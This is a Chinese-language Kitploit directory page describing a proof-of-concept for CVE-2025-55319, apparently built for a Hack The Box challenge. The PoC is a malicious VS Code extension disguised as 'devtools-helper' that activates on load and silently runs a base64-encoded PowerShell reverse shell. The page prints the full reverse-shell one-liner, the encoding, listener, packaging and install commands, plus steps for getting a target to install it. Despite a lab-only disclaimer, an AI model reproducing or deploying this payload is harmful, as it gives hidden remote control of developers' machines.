Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55319-PoC — CVE-2025-55319 的 PoC | Kitploit
工具/GitHubGitHub/nephila016/cve-2025-55319-poc
漏洞利用CTF命令与控制社会工程学红队远程访问工具Payload 开发实验室与实践
GitHubnephila016/cve-2025-55319-poc

CVE-2025-55319-PoC

CVE-2025-55319 的 PoC

查看仓库
62个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Reference: CVE-2025-55319

针对 HTB "Checkpoint" 挑战的 VS Code (.vsix) 扩展概念验证。 安装后,扩展自动激活并产生一个隐藏的 PowerShell 反向 shell 回连到攻击者。

⚠️ 仅限授权使用。 这是一个 CTF/实验室环境产物。仅可部署在你拥有或明确授权测试(例如 HTB 目标机)的机器上。


工作原理

  • extension/package.json — 扩展清单。"activationEvents": ["*"] 使它在 VS Code 加载时即刻运行,无需用户交互。
  • extension/extension.js — 在 activate() 时,执行一个 base64 编码的 PowerShell 负载,使用 -WindowStyle Hidden -NoProfile 实现静默反向 shell。
  • [Content_Types].xml — OpenXML 内容类型清单,使文件夹可被压缩为有效的 .vsix 包。

目录结构

root@kitploit:~
.
├── [Content_Types].xml     # VSIX 内容类型清单
└── extension/
    ├── package.json        # 扩展清单(在 "*" 时激活)
    └── extension.js        # 反向 shell 负载

使用方法

1. 构建你的负载

生成指向你攻击机的 base64 (UTF-16LE) PowerShell 反向 shell:

root@kitploit:~
LHOST=10.10.15.158
LPORT=4443
PS="\$c=New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){\$d=(New-Object System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=(iex \$d 2>&1|Out-String);\$sb=([text.encoding]::ASCII).GetBytes(\$r+'PS> ');\$s.Write(\$sb,0,\$sb.Length);\$s.Flush()}"
echo -n "$PS" | iconv -t UTF-16LE | base64 -w0

将输出粘贴到 extension/extension.js 中的 YOUR_BASE64_PAYLOAD_HERE 位置:

root@kitploit:~
const payload = '<base64-blob-here>'

2. 启动你的监听器

root@kitploit:~
nc -lvnp 4443

3. 打包为 .vsix

一个 .vsix 文件就是一个 ZIP,其中包含 extension/ 文件夹以及在根目录的清单文件:

root@kitploit:~
# 在此目录下执行
zip -r devtools-helper.vsix extension "[Content_Types].xml"

4. 交付并触发

让目标安装该扩展。方式:

  • CLI: code --install-extension devtools-helper.vsix
  • GUI: 扩展视图 → ··· 菜单 → 从 VSIX 安装…

在下次启动 VS Code 时(或安装后立即),* 激活事件触发,负载运行,你的监听器接收到 shell。

root@kitploit:~
$ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.15.158] from ...
PS>

清理

完成后从目标卸载扩展:

root@kitploit:~
code --uninstall-extension devtools.devtools-helper

注意

  • 负载针对 Windows(PowerShell)。可根据需要修改 extension.js 以支持其他平台。
  • extension.js 中导入了 os 但未使用——如果你希望根据 os.platform() 分支支持 Linux/macOS 目标,会很方便。
  • 如果要重新打包,请在 package.json 中递增 version。
下载工具